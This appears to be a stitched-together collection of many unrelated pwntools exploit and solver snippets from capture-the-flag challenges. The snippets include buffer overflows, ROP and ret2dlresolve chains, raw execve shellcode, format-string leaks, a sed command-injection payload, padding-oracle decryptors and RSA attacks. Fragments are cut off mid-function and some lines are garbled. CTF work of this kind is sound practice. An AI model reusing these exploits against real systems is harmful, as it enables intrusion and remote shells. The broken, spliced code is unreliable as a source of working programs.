def encrypt(m, r=1):
conn = remote(HOST, PORT)
conn.recv(1024)
conn.sendline(str(m))
conn.recv(1024)
conn.sendline(str(r))
ret = int(conn.recv(1024).split(" ")[1])
conn.close()
return ret
def solve():
r = pwn.remote('shopping.ctf.site', 21111)
#while True:
l = r.recvline().strip('\n')
print(l)
if(l.startswith('Enter a raw string (max. 32 bytes) that meets the following condition: hex(sha1(input))[0:6] ==')):
hexedval = l.replace('Enter a raw string (max. 32 bytes) that meets the following condition: hex(sha1(input))[0:6] == ', '')
payload = brute_sha1hex(hexedval)
print ('Found payload={}'.format(payload))
r.writeline(payload)
r.interactive()
def main():
import pwn
host, port = "cm2k-sorcery_13de8e6bf26e435fc43efaf46b488eae.quals.shallweplayaga.me", 12002
r = pwn.remote(host, port)
print r.readuntil("newline\n")
while True:
filename = r.readuntil("\n").strip("\n")
print filename
sol = solve(filename)
print repr(sol)
data = sol.encode("base64")
print "Send this:" + data
r.send(data)
def leaker(port):
r = pwn.remote('localhost', port = port)
d = r.recv(8)
func = pwn.p32
if len(d) == 8:
func = pwn.p64
def l(addr):
r.send(pwn.flat(addr, func = func))
d = r.recv(8)
if d is None or len(d) == 0:
raise 'Peer closed connection'
return d
return l
def main():
#solve("65cb596908789372c2d6fbeb0ac3a0e3a1089039138711a016ec3994ad5c7f10")
import pwn
host, port = "cm2k-magic_b46299df0752c152a8e0c5f0a9e5b8f0.quals.shallweplayaga.me", 12001
r = pwn.remote(host, port)
print r.readuntil("newline\n")
while True:
filename = r.readuntil("\n").strip("\n")
print filename
sol = solve(filename)
print repr(sol)
data = sol.encode("base64")
print "Send this:" + data
r.send(data)
def main():
r = remote("120.27.4.96", 14000)
# r = process("rsa3.py")
verify(r)
r.readuntil("token: ")
token = "d58c9a2aca58a3f2faf17ec5e7deaec6ZHSBHK6e"
r.sendline(token)
r.readuntil("P: ")
P = r.readline().strip()
P = int(P[2:-1], 16)
r.readuntil('key:')
b = getRandomNBitInteger(m/4)
r.sendline(str(b))
r.readuntil("n: ")
n = r.readline().strip()
n = int(n[2:-1], 16)
e = 0x10001
r.readuntil("e2: ")
e2 = r.readline().strip()
e2 = int(e2[2:], 16)
r.readuntil("flag is: ")
flag = r.readline().strip()
flag = int(flag[2:-1], 16)
r.close()
print "n: ", hex(n)
print "e: ", hex(e)
print "e2: ", hex(e2)
print "flag: ", hex(flag)
print "=======start attack====="
t = get_bit(n, 1024, 1)
print "t: ", hex(t)
s = pi_sit_x1(o, t)
print "s: ", hex(s)
attack_spub = get_bit(s, m, 0)
# if attack_spub == spub:
# return True
# else:
# t += 1
# s = pi_sit_x1(o, t)
# attack_spub = get_bit(s, m, 0)
# if attack_spub == spub:
# return True
# else:
# raw_input()
# return False
attack_spriv = pow(attack_spub, b, P)
print "spub: ", hex(attack_spub)
print "spriv: ", hex(attack_spriv)
def connect(url, sid=None, data=None, gdb=False):
s = pwn.remote(REMOTE[0], REMOTE[1])
s.sendline(('GET /?' if not data else 'POST /?') + url + ' HTTP/1.1\r')
s.sendline('Host: firmware.insomni.hack\r')
s.sendline('Connection: keep-alive\r')
if sid:
s.sendline('Cookie: sid=' + sid + '\r')
if data:
s.sendline('Content-length: ' + str(len(data)) + '\r')
s.sendline('\r')
if data:
import time
time.sleep(1)
s.send(data)
return s
def __init__(self, user, passwd):
prog = log.progress('Logging in...')
p = remote('ptt.cc', 23)
p.recvrepeat(0.1) # Login screen
p.sendline(user + ',\r')
p.recvrepeat(0.1) # Enter password
p.sendline(passwd + '\r')
if p.recvrepeat(1).find('您想刪除其他重複登入的連線嗎') != -1:
p.sendline('n\r')
p.recvuntil('請按任意鍵繼續')
p.sendline('\r')
p.recvrepeat(0.1)
prog.success('Done')
self.p = p
self._board = None
self._article = None
def rand_login():
s = remote(HOST, PORT)
# login
s.recvuntil(': ')
user = choice(users.keys())
s.sendline(user)
# pass
# Sometimes log in correctly, otherwise use a random pass
# Never login as clinton
s.recvuntil(': ')
pwd = users[user] if user != 'clinton' and random() < 0.25 else ''.join([choice(ascii) for j in xrange(randint(5, 50))])
s.sendline(pwd)
s.recvall()
s.close()
def exploit(ip, port, flag_id):
pwn.context(timeout=10)
dict_id = "".join(random.choice(string.ascii_letters) for i in range(30))
word = "".join(random.choice(string.ascii_letters) for i in range(30))
payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id)
r = pwn.remote(ip, port)
r.recvline()
r.send("dict {}\n".format(dict_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n')
r.recvline()
r.send("translate {}\n".format(word))
r.send('quit\n')
r.recvline()
flagline = r.recvline()
flag = re.match("s/secretik/(.*)/gi;", flagline).group(1)
return {"FLAG" : flag}
def legit_login():
# Send it into lockdown
s = remote(HOST, PORT)
user = '******'
# login
s.recvuntil(': ')
s.sendline(user)
# pass
s.recvuntil(': ')
s.sendline(users[user])
# rekt
s.recvuntil(': ')
s.sendline('uhhh....China?')
s.recvall()
s.close()
def main():
r = remote("115.159.191.193", 12000)
# r = process("rsa1.py")
verify(r)
r.readuntil("token: ")
token = "81755de89626aba8db7de4c93e658b68wBJekMIo"
r.sendline(token)
r.readuntil("n: ")
n = r.readline().strip()
n = int(n[2:-1], 16)
r.readuntil("e: ")
e = r.readline().strip()
e = int(e[2:-1], 16)
r.readuntil("is: ")
enc_flag = r.readline().strip()
enc_flag = int(enc_flag[2:-1], 16)
print "We know:"
print "n: ", hex(n)
print "e: ", hex(e)
print "flag: ", hex(enc_flag)
print "=======Start Attack======"
t = pi_b(e)
print "get t = ", hex(t)
phi_n = wiener_attack(t, n)
try:
u = invmod(t, phi_n)
except:
return False
print "get u = ", hex(u)
qq, pp = divide_pq(u*t, n)
print "get p = ", hex(pp)
print "get q = ", hex(qq)
d = invmod(e, (qq-1)*(pp-1))
print "get d = ", hex(d)
flag = pow(enc_flag, d, n)
print "get flag: ", long_to_bytes(flag)
def solve():
r = pwn.remote('misc.chal.csaw.io',4239)
print(r.recvline())
result_string1 = '';
result_string2 = '';
while True:
l1 = r.recvline().strip('\n')
l2 = l1[1:10]
parity = bit_xor(l2)
print('InitialMessage={} WithoutStartStop={} Parity={}'.format(l1, l2, parity))
if(parity == 0):
l3 = l2[0:8]
unb = pwn.unbits(l3)
print('Parity! Without parity bit={} unb={}'.format(l3, unb))
result_string1 = result_string1 + unb
print(result_string1)
result_string2 = result_string2 + l3;
print(pwn.unbits(result_string2))
r.writeline('1')
else:
r.writeline('0')
def set_flag(ip, port, flag):
pwn.context(timeout=10)
flag_id = "".join(random.choice(string.ascii_letters) for i in range(30))
token = "".join(random.choice(string.ascii_letters) for i in range(30))
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("dict {}\n".format(flag_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary")
r.send("add secretik {}\n".format(flag))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
return {"FLAG_ID" : flag_id, "TOKEN" : token}
def get_flag(ip, port, flag_id, token):
pwn.context(timeout=10)
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("dict {}\n".format(flag_id))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate secretik\n")
flag = r.recvline().strip()
if not flag != "secretik":
raise RuntimeError("Flag not present or deleted")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
return {"FLAG" : flag}
def main():
r = remote("115.159.191.193", 13000)
# r = process("rsa2.py")
verify(r)
r.readuntil("token: ")
token = "d58c9a2aca58a3f2faf17ec5e7deaec6ZHSBHK6e"
r.sendline(token)
# r.readuntil("p4: ")
# p_4 = r.readline().strip()
# p_4 = int(p_4[2:-1], 16)
r.readuntil("n: ")
n = r.readline().strip()
n = int(n[2:-1], 16)
e = 0x10001
r.readuntil("e2: ")
e2 = r.readline().strip()
e2 = int(e2[2:], 16)
print "n: ", hex(n)
print "e: ", hex(e)
print "e2: ", hex(e2)
r.readuntil("flag is: ")
flag = r.readline().strip()
flag = int(flag[2:-1], 16)
print "flag: ", hex(flag)
print "=======start attack====="
n1 = get_bit(n, 3*k/8, 1)
# print "n1: ", hex(n1)
p4 = pi_b(get_bit(n1, 5*k/16, 0), 0)
# if p_4 == p4:
# return True
# else:
# return False
print "p4: ", hex(p4)
r.close()
import itertools
from pwn import remote
r = remote('ppc1.chal.ctf.westerns.tokyo', 31111)
r.recvuntil('Input: ')
while True:
print r.recvuntil('Input: ')
inp = r.recvline().strip().split(' ')
print inp
r.recvuntil('Answer: ')
if int(inp[0]) < 11:
print "Brute-forcing..."
for p in itertools.permutations(inp[1:]):
s = ''.join(p)
if s == s[::-1]:
print p
r.sendline(' '.join(p))
break
print r.recv()
#!/usr/bin/env python2
import pwn
remote = True
flag = ""
last_char = ""
index = 0
while last_char != '}':
if remote:
r = pwn.remote("babytrace.quals2019.oooverflow.io", 5000)
else:
r = pwn.process("pitas.py")
# Header
r.recvuntil("# Are you ready for the PITA?\n\n")
# Binary select
r.recvuntil("Choice: ")
r.sendline("2")
# start trace
r.recvuntil("Choice: ")
r.sendline("1")
# add input constraint
r.recvuntil("Choice: ")
r.sendline("3")
# r.sendline("input")
def run(host,port,cipher,size_block,error,verbose=True):
cipher = cipher.upper()
found = False
valide_value = []
result = []
len_block = size_block*2
cipher_block = split_len(cipher, len_block)
if len(cipher_block) == 1:
print "[-] Abort there is only one block"
sys.exit()
#for each cipher_block
s=pwn.remote(host,port)
for block in reversed(range(1,len(cipher_block))):
if len(cipher_block[block]) != len_block:
print "[-] Abort length block doesn't match the size_block"
break
print "[+] Search value block : ", block, "\n"
#for each byte of the block
for i in range(0,size_block):
# test each byte max 255
for ct_pos in range(0,256):
# 1 xor 1 = 0 or valide padding need to be checked
if ct_pos != i+1 or (len(valide_value) > 0 and int(valide_value[-1],16) == ct_pos):
bk = block_search_byte(size_block, i, ct_pos, valide_value)
bp = cipher_block[block-1]
bc = block_padding(size_block, i)
tmp = hex_xor(bk,bp)
cb = hex_xor(tmp,bc).upper()
up_cipher = cb + cipher_block[block]
#time.sleep(0.5)
# we call the oracle, our god
s.sendline(up_cipher)
pr=s.recv()
if verbose == True:
exe = re.findall('..',cb)
discover = ('').join(exe[size_block-i:size_block])
current = ('').join(exe[size_block-i-1:size_block-i])
find_me = ('').join(exe[:-i-1])
sys.stdout.write("\r[+] Test [Byte %03i/256 - Block %d ]: \033[31m%s\033[33m%s\033[36m%s\033[0m \n" % (ct_pos, block, find_me, current, discover))
sys.stdout.flush()
if pr.find(error)==-1:
found = True
#connection.close()
# data analyse and insert in rigth order
value = re.findall('..',bk)
valide_value.insert(0,value[size_block-(i+1)])
if verbose == True:
print ''
print "[+] Block M_Byte : %s\n"% bk
print "[+] Block C_{i-1}: %s\n"% bp
print "[+] Block Padding: %s\n"% bc
print ''
bytes_found = ''.join(valide_value)
if i == 0 and bytes_found.decode("hex") > hex(size_block) and block == len(cipher_block)-1:
print "[-] Error decryption failed the padding is > "+str(size_block)
sys.exit()
print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1, "bytes :", bytes_found
print ''
break
if found == False:
# lets say padding is 01 for the last byte of the last block (the padding block)
if len(cipher_block)-1 == block and i == 0:
value = re.findall('..',bk)
print value
valide_value.insert(0,"01")
if verbose == True:
print ''
print '[-] No padding found, but maybe the padding is length 01 :)'
print "[+] Block M_Byte : %s"% bk
print "[+] Block C_{i-1}: %s"% bp
print "[+] Block Padding: %s"% bc
print ''
bytes_found = ''.join(valide_value)
else:
print "\n[-] Error decryption failed"
result.insert(0, ''.join(valide_value))
hex_r = ''.join(result)
print "[+] Partial Decrypted value (HEX):", hex_r.upper()
padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
sys.exit()
found = False
result.insert(0, ''.join(valide_value))
valide_value = []
print ''
hex_r = ''.join(result)
print "[+] Decrypted value (HEX):", hex_r.upper()
padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
import pwn
import itertools
import string
import hashlib
import sympy # perfect_power
from Crypto.Util.number import isPrime
#import Crypto.Util as Cr
#import isPrime from Crypto.Util.number
r = pwn.remote('secuprim.asis-ctf.ir',42738)
print(r.recvline())
print(r.recvline())
bot_task = r.recvline()
print(bot_task)
print(r.recvline())
def bruteforce(charset, minlength, maxlength):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
key_part_2 = bot_task[12:34]
print('part2=')
print(key_part_2)
sha_key = bot_task[52:84]
print('sha_key_starts with')
print(sha_key)
import pwn
import sys
if '--remote' in sys.argv:
p = pwn.remote("chall.pwnable.tw", 10001)
else:
p = pwn.process("./orw")
output = p.recv(len("Give my your shellcode:"))
shellcode = open("shellcode.bin", 'rb').read()
assert len(shellcode) < 200
p.send(shellcode)
output = p.recvall()
print(output)
import pwn
pwn.context.binary = e = pwn.ELF("./resolve")
# p = pwn.process("./resolve")
p = pwn.remote("pwn.utctf.live", 5435)
if pwn.args.GDB:
pwn.gdb.attach(
p,
gdbscript="""
break *(&main+29)
continue
""",
)
r = pwn.ROP(e)
d = pwn.Ret2dlresolvePayload(e, symbol="system", args=["sh"])
r.raw(0x401159) # ret gadget to align stack
r.gets(d.data_addr)
r.ret2dlresolve(d)
payload = pwn.fit({0x10: r.chain()}) + b"\n" + d.payload
p.sendline(payload)
p.interactive()
#/usr/bin/python3
import pwn
import sys
e = pwn.ELF('chall')
p = pwn.remote('pwn.ctf.zer0pts.com', 9011)
p.recvuntil("Data: ")
pld = 0x100 * b"A"
pld += pwn.p64(e.symbols['__stack_shadow'] + 0x100)
p.sendline(pld)
p.recvuntil("Data: ")
pld = b"A" * 8 + pwn.p64(e.symbols['__stack_shadow'] + 16)
pld += b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
p.sendline(pld)
p.interactive()
# zer0pts{1nt3rm3d14t3_pwn3r5_l1k3_2_0v3rwr1t3_s4v3d_RBP}
break
def pwn_retrive_record(p, pwnstring):
p.readuntil('What do you want to do?\n')
p.sendline('3')
p.readuntil('identifier: ')
p.sendline(pwnstring)
p.readuntil('you are: ')
flag = p.readline()
return flag
def pwn_exit(p):
p.readuntil('What do you want to do? ')
p.sendline('4')
p = pwn.remote(team_ip, team_port)
#record_b64 = 'a:1:{i:0;O:6:"Record":1:{s:10:"identifier";s:6:' + base64.b64encode(queryid.encode("utf-8")) + ';}}'
#pwn_store_record(p, pwnstring)
#pwn_retrive_record(p, record_b64)
pwn_python(p)
pwn_exit(p)
#!/usr/bin/env python3
from pwn import process, remote
from base64 import b64decode, b64encode
# io = process(["python", "chal.py"])
io = remote("cbcbc.chal.acsc.asia", 52171)
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"username: "******"")
io.recvuntil(b"token: \n")
enc = b64decode(io.recvline().strip())
iv1, iv2, ct = enc[:16], enc[16:32], enc[32:]
def oracle(iv, block):
enc = iv + iv2 + block
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"username: "******"l3o")
io.sendlineafter(b"token: ", b64encode(enc))
r = io.recvlineS()
return "Check your token again" not in r
def oracle2(iv, block):
enc = iv1 + iv + block
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"username: "******"l3o")
io.sendlineafter(b"token: ", b64encode(enc))
r = io.recvlineS()
return "Check your token again" not in r
import pwn
import base64
import os
print "Started!"
r = pwn.remote("crypto.chal.csaw.io", 8000)
l1 = r.recvall(timeout = 5)
print(l1)
print('START DECODING')
decoded_str = base64.b64decode(l1)
decoded_str2 = base64.b64decode(l1[::-1])
print ('DECODE FINISHED')
# print(decoded_str)
print('CREATING FILE')
f = open('/root/Desktop/github/RT_CTF/csaw/sleeping_guard.png', 'wb')
f.write(decoded_str)
f.close()
f = open('/root/Desktop/github/RT_CTF/csaw/sleeping_guard2.png', 'wb')
f.write(decoded_str2)
f.close()
vec = []
while length > _sage_const_0:
vec = [num % q] + vec
num //= q
length -= _sage_const_1
return vec
def to_mat(numlist):
M = []
for i in numlist:
M.append(to_vec(i, _sage_const_40))
return M
CON = pwn.remote('172.27.176.1', _sage_const_10000)
resp = CON.recvuntil('key1:\n').decode().split('\n')
n = int(resp[_sage_const_0])
e = _sage_const_65537
enc = int(resp[_sage_const_3])
for _ in range(_sage_const_14):
CON.sendline(str(shiftf0(enc, _)).encode())
resp = CON.recvuntil('key1:\n').decode()
print(_, resp)
CON.sendline(str(shiftf0(enc, _ + _sage_const_1)).encode())
resp = CON.recvuntil('key2:\n').decode().split('\n')
_res = resp[_sage_const_0][_sage_const_29:-_sage_const_1].split(',')
res = []
for i in _res:
res += [int(i)]
import base64
def shift(i, cs):
plaintext = copy.copy(cs)
for idx, c in enumerate(cs):
v = ord(c)
p = i + ord(c)
if v >= 97 and v <= 122 and p > 122 or v >= 65 and v <= 90 and p > 90:
plaintext[idx] = chr(p - 26)
elif v >= 97 and v <= 122 or v >= 65 and v <= 90:
plaintext[idx] = chr(p)
return plaintext
r = remote("140.112.31.109", 10000)
# round 1
xs = r.recv(timeout=0.1).decode("utf-8").split("\n")
xs += r.recv(timeout=0.1).decode("utf-8").split("\n")
# I don't know why it can't read in one time. A single line works in ipython.
ss = []
for line in xs:
print(line)
if line[:2] == "m1" or line[:2] == "c1" or line[:2] == "c2":
ss = ss + [line]
ss = [line[5:] for line in ss]
codebook = {}
nShift = ord(ss[0][0]) - ord(ss[1][0])
if nShift < 0:
nShift += 26
plaintext = list(ss[2])
def next_name(name):
assert len(name) == 4
h = struct.unpack('<i', name)[0] ^ 0x12345678
while True:
h += 1
name = struct.pack('<i', h ^ 0x12345678)
if not (b' ' in name or b'\0' in name or b'\r' in name or b'\n' in name
or b'\t' in name or b'\x0b' in name or b'\x0c' in name):
break
return name
# r = process(['./exceptional'])
r = remote('exceptional.2020.ctfcompetition.com', 1337)
# This is to point to a "fake" city with hash 0 so that its name is the flag:
override_val = (0x7440 - 0x10 - 0x7120) // 4
to_override = struct.pack('<I', override_val ^ 0x12345678)
# Build a tree with root val 2, one left child with val -1, and a long right
# tail so that we overflow the stack upon searching it
name = struct.pack('<I', 2 ^ 0x12345678)
init = name
name = next_name(name)
names = []
for i in range(99):
names.append(name)
name = next_name(name)
def call_oracle(host,cookie,url,post,method,up_cipher):
s=pwn.remote(host,51014)
return s
#!/usr/bin/env python3
from itertools import product
import pwn
import itertools
import hashlib
pwn.context.log_level = 'DEBUG'
IP, PORT = 'dodge.ctf.defenit.kr', 1357
p = pwn.remote(IP, PORT)
WIDTH, HEIGHT = 40, 20
def PoW():
target = p.recvline(keepends=False)[-33:-1].decode()
assert len(target) == 32
for i in range(1 << 24):
cand = i.to_bytes(3, 'big')
if hashlib.md5(cand).hexdigest() == target:
pwn.log.info('PoW done')
p.send(cand)
break
p.recvuntil('q, e : move focus(*)\nw, a, s, d : move player(p)\n')
def recvMap():
Map = []
p.recvuntil('##########################################\n')
for _ in range(HEIGHT):
row = list(p.recvline(keepends=False).decode().strip('#'))
Map.append(row)
def proof(END, HASH):
table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
for i in table:
for j in table:
for k in table:
for l in table:
STR = i + j + k + l + END
if sha256(STR.encode()).hexdigest() == HASH:
print(i + j + k + l)
return i + j + k + l
pt = b"Hello, I'm a Bytedancer. Please give me the flag!"
con = pwn.remote('39.105.181.182', 30001)
resp = con.recvuntil('> ').decode().split('\n')[-2]
END = resp[12:40]
HASH = resp[45:]
con.sendline(proof(END, HASH).encode())
resp = con.recvuntil('> ').decode()
con.sendline(('0' * 1024).encode())
resp = con.recvuntil('> ').decode()
tmp = int(resp.split('\n')[1][32:34], 16)
END = hex(tmp ^ 1)[2:].ljust(2, '0')
DATA = ['0'] * 1022 + [END[0], END[1]]
roundnum = ''
TABLE = [50, 250, 450]
for i in range(49):
sleep(1)
idx = TABLE[i % 3]
p.recvuntil(b"> ")
p.sendline(b"A")
p.recvuntil(b"> ")
p.sendline(employee_name)
def change_employee(employee_num, employee_new_name):
p.recvuntil(b"> ")
p.sendline(b"C")
p.recvuntil(b"> ")
p.sendline("%d" % employee_num)
p.recvuntil(b"> ")
p.sendline(employee_new_name)
p = remote("challenges.ctf.kaf.sh", 8000)
#p = process('./shadowstuck', env={"LD_PRELOAD":"./libc-2.31.so"})
libc = ELF('./libc-2.31.so')
base_shadowstack = int(p.recvline().split(b'at ')[1][:-1], 16)
print("[+] Shadowstack @ 0x%x" % base_shadowstack)
add_employee("Mike") #0
fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2])
leak = unpack(read_employee(1).ljust(8, b'\x00'))
print("[+] Leak libc @ 0x%x" % leak)
libc.address = leak - 159923
print("[+] Libc @ 0x%x" % libc.address)
#!/usr/bin/env python3
import pwn
rem = pwn.remote('chall.pwnable.tw', 10101)
libc = pwn.ELF('./libc_32.so.6')
rem.recvuntil(':')
rem.sendline('A' * 24)
rem.recvline()
libc_leak = b'\x00' + rem.recvuntil(':')[0:3]
libc_leak = pwn.u32(libc_leak)
leak_offset = libc.get_section_by_name('.got.plt').header.sh_addr
libc_base = libc_leak - leak_offset
system_addr = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + list(libc.search(b'/bin/sh\x00'))[0]
num = 35
rem.sendline(str(num))
# 24 zeros
for _ in range(24):
rem.recvuntil(': ')
rem.sendline('0')
# canary
rem.recvuntil(': ')
rem.sendline('+')
# system address
#!/usr/bin/env python3
from pwn import process, context, ELF, remote, u32, pause
from fastpwn import pack, aslr, log
from time import sleep
from sys import argv
if len(argv) > 1 and argv[1] == "-r":
p = remote("chall.pwnable.tw", 10101)
else:
p = process('./dubblesort', env={'LD_LIBRARY_PATH': './'})
context.log_level = 'DEBUG'
elf = ELF('./libc_32.so.6', checksec=False)
mov_ebx_esp = pack.pk32(0x00000750) # mov ebx, [esp] ; ret
n = lambda x: "A" * (x * 4)
def s(
i,
un=""
): # s() func is an idea i got from reading r4j's exploit pocs, great job man :)
if un:
p.recvuntil(str(un))
p.sendline(str(i))
else:
p.sendline(str(i))
#p.interactive() # reason for leak is due to strong not being null terminated
# printf will continue to read and write until it reaches a null terminator.
# 6 DWORDS is offset to .got.plt leak
#!/usr/bin/env python
import pwn
# attack = pwn.process('./bof')
attack = pwn.remote('pwnable.kr', 9000)
payload = 52 * 'a'
# print payload
payload += pwn.p32(0xcafebabe)
# attack.recvuntil("overflow me :")
attack.send(payload)
attack.interactive()
def oracle(self, data, **kwargs):
somecookie = byte_to_hex(data)
print(somecookie)
if somecookie[32:] == "00000000000000000000000000000000":
if somecookie[:30] == "000000000000000000000000000000":
if somecookie[30:32] != '24':
raise BadPaddingException()
elif somecookie[:28] == "0000000000000000000000000000":
if somecookie[28:30] != '6C':
raise BadPaddingException()
elif somecookie[:26] == "00000000000000000000000000":
if somecookie[26:28] != 'AC':
raise BadPaddingException()
elif somecookie[:24] == "000000000000000000000000":
if somecookie[24:26] != 'A7':
raise BadPaddingException()
elif somecookie[:22] == "0000000000000000000000":
if somecookie[22:24] != '6F':
raise BadPaddingException()
elif somecookie[:20] == "00000000000000000000":
if somecookie[20:22] != '19':
raise BadPaddingException()
elif somecookie[:18] == "000000000000000000":
if somecookie[18:20] != '78':
raise BadPaddingException()
elif somecookie[:16] == "0000000000000000":
if somecookie[16:18] != '62':
raise BadPaddingException()
elif somecookie[:14] == "00000000000000":
if somecookie[14:16] != 'D7':
raise BadPaddingException()
elif somecookie[:12] == "000000000000":
if somecookie[12:14] != 'D2':
raise BadPaddingException()
elif somecookie[:10] == "0000000000":
if somecookie[10:12] != '8F':
raise BadPaddingException()
elif somecookie[:8] == "00000000":
if somecookie[8:10] != '71':
raise BadPaddingException()
elif somecookie[:6] == "000000":
if somecookie[6:8] != '27':
raise BadPaddingException()
elif somecookie[:4] == "0000":
if somecookie[4:6] != 'AF':
raise BadPaddingException()
elif somecookie[:2] == "00":
if somecookie[2:4] != '96':
raise BadPaddingException()
elif somecookie[0:2] != '32':
raise BadPaddingException()
elif somecookie[32:] == "5F96AE25728BD7D165701065ACA0612A":
if somecookie[:30] == "000000000000000000000000000000":
if somecookie[30:32] != '9B':
raise BadPaddingException()
elif somecookie[:28] == "0000000000000000000000000000":
if somecookie[28:30] != '3D':
raise BadPaddingException()
elif somecookie[:26] == "00000000000000000000000000":
if somecookie[26:28] != 'D4':
raise BadPaddingException()
elif somecookie[:24] == "000000000000000000000000":
if somecookie[24:26] != '76':
raise BadPaddingException()
elif somecookie[:22] == "0000000000000000000000":
if somecookie[22:24] != '63':
raise BadPaddingException()
elif somecookie[:20] == "00000000000000000000":
if somecookie[20:22] != '41':
raise BadPaddingException()
elif somecookie[:18] == "000000000000000000":
if somecookie[18:20] != 'C5':
raise BadPaddingException()
elif somecookie[:16] == "0000000000000000":
if somecookie[16:18] != '9C':
raise BadPaddingException()
elif somecookie[:14] == "00000000000000":
if somecookie[14:16] != '0B':
raise BadPaddingException()
elif somecookie[:12] == "000000000000":
if somecookie[12:14] != '63':
raise BadPaddingException()
elif somecookie[:10] == "0000000000":
if somecookie[10:12] != 'FD':
raise BadPaddingException()
elif somecookie[:8] == "00000000":
if somecookie[8:10] != '80':
raise BadPaddingException()
#elif somecookie[:6] == "000000":
# if somecookie[6:8] != '':
# raise BadPaddingException()
#elif somecookie[:4] == "0000":
# if somecookie[4:6] != '':
# raise BadPaddingException()
#elif somecookie[:2] == "00":
# if somecookie[2:4] != '':
# raise BadPaddingException()
#elif somecookie[0:2] != '':
# raise BadPaddingException()
#elif somecookie[32:] == "5F96AE25728BD7D165701065ACA0612A":
#if somecookie[:30] == "000000000000000000000000000000":
# if somecookie[30:32] != '9B':
# raise BadPaddingException()
#elif somecookie[:28] == "0000000000000000000000000000":
# if somecookie[28:30] != '':
# raise BadPaddingException()
#elif somecookie[:26] == "00000000000000000000000000":
# if somecookie[26:28] != '':
# raise BadPaddingException()
#elif somecookie[:24] == "000000000000000000000000":
# if somecookie[24:26] != '':
# raise BadPaddingException()
#elif somecookie[:22] == "0000000000000000000000":
# if somecookie[22:24] != '':
# raise BadPaddingException()
#elif somecookie[:20] == "00000000000000000000":
# if somecookie[20:22] != '':
# raise BadPaddingException()
#elif somecookie[:18] == "000000000000000000":
# if somecookie[18:20] != '':
# raise BadPaddingException()
#elif somecookie[:16] == "0000000000000000":
# if somecookie[16:18] != '':
# raise BadPaddingException()
#elif somecookie[:14] == "00000000000000":
# if somecookie[14:16] != '':
# raise BadPaddingException()
#elif somecookie[:12] == "000000000000":
# if somecookie[12:14] != '':
# raise BadPaddingException()
#elif somecookie[:10] == "0000000000":
# if somecookie[10:12] != '':
# raise BadPaddingException()
#elif somecookie[:8] == "00000000":
# if somecookie[8:10] != '':
# raise BadPaddingException()
#elif somecookie[:6] == "000000":
# if somecookie[6:8] != '':
# raise BadPaddingException()
#elif somecookie[:4] == "0000":
# if somecookie[4:6] != '':
# raise BadPaddingException()
#elif somecookie[:2] == "00":
# if somecookie[2:4] != '':
# raise BadPaddingException()
#elif somecookie[0:2] != '':
# raise BadPaddingException()
# TODO manage the lack of connection (n-retries when no connection are possibles)
sock = pwn.remote(HOST, PORT)
sock.sendafter('What is your cookie?\n', somecookie + '\n')
buf = sock.recvall()
resp.write(somecookie)
resp.write(buf)
if 'File "/problems/magic-padding-oracle_4_b6a931ed628517746b8ea88c8688f148/pkcs7.py", line 20, in isvalidpad' in buf:
raise Exception('Exception for this script')
if 'invalid padding' in buf:
raise BadPaddingException()
pwn.log.info('No padding exception raised on %r', somecookie)
from pwn import process, remote, p64
HOST = 'ctf-challs.sinf.pt'
PORT = 1339
#io = process("./coal_mine", level="debug")
io = remote(HOST, PORT, level='debug')
io.recvuntil("fellow miner?\n")
io.sendline("%15$p")
io.recvuntil("Thanks, ")
line = io.recvuntil("\n").strip()
value = int(line, 16)
value_str = "".join(chr(c) for c in p64(value))
io.recvuntil("mining today?")
injection = 'A' * 40 + value_str + 8 * 'A' + '\x84\x12\x40\x00\x00\x00\x00\x00'
io.sendline(injection)
io.interactive()
# context.log_level = 'debug'
N = 16
def to_block(b):
return '{:0{width}x}'.format(b, width=N*2).decode('hex')
def to_blocks(m):
m += to_block(len(m))
padb = N - len(m) % N
m += chr(padb) * padb
blocks = [m[N*i : N*(i+1)] for i in range(len(m) // N)]
return blocks
# r = process('./macsh.py')
